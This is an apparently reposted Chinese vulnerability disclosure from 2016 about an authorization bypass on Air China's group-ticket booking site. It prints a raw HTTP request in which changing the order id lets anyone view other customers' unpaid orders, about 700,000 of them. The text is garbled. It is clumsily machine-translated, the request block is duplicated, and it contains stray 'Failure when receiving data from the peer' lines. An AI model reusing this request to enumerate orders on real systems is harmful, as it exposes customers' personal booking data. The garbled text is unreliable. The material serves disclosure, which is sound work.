国航某网站可越权访问其他订单/涉及70W左右
漏洞标题 国航某网站可越权访问其他订单/涉及70W左右 相关厂商 中国航空集团财务有限责任公司 漏洞作者 IcesWord 提交时间 2016-05-05 16:53 公开时间 2016-06-20 …
漏洞标题
国航的网站可以访问其他订单/约70W
相关制造商
中航集团财务有限公司
漏洞作者
用IceSword
提交时间
2016-05-05 16: 53
公共时间
2016-06-20 10: 40
漏洞类型
未经授权的访问/许可绕过
危险等级
高
自我评估等级
18
漏洞状态
制造商已确认
标签标签
平行权威
漏洞详细信息
Tuan.airchina.com
国航集团购买网站
可以遍历未支付的订单,涉及约70W(打嗝遍历)
GEThttp://tuan.airchina.com/booking/payForGroupTicket.htm?oid=760004 HTTP/1.1
主持人: tuan.airchina.com
用户代理: Mozilla/5.0(Windows NT 6.1; WOW64; rv: 29.0)Gecko/20100101 Firefox/29.0
接受: text/html,application/xhtml + xml,application/xml; q=0.9,*/*; q=0.8
Accept-Language: zh-cn,zh; q=0.8,en-us; q=0.5,en; q=0.3
Accept-Encoding: gzip,deflate
Referer:http://tuan.airchina.com/booking/readyBooking.htm
Failure when receiving data from the peer
Failure when receiving data from the peer
可以遍历未支付的订单,涉及约70W(打嗝遍历)
GEThttp://tuan.airchina.com/booking/payForGroupTicket.htm?oid=760004 HTTP/1.1
主持人: tuan.airchina.com
用户代理: Mozilla/5.0(Windows NT 6.1; WOW64; rv: 29.0)Gecko/20100101 Firefox/29.0
接受: text/html,application/xhtml + xml,application/xml; q=0.9,*/*; q=0.8
Accept-Language: zh-cn,zh; q=0.8,en-us; q=0.5,en; q=0.3
Accept-Encoding: gzip,deflate
Referer:http://tuan.airchina.com/booking/readyBooking.htm
Failure when receiving data from the peer
Failure when receiving data from the peer
- 发表于 2016-07-17 08:00
- 阅读 ( 512 )
- 分类:黑客技术
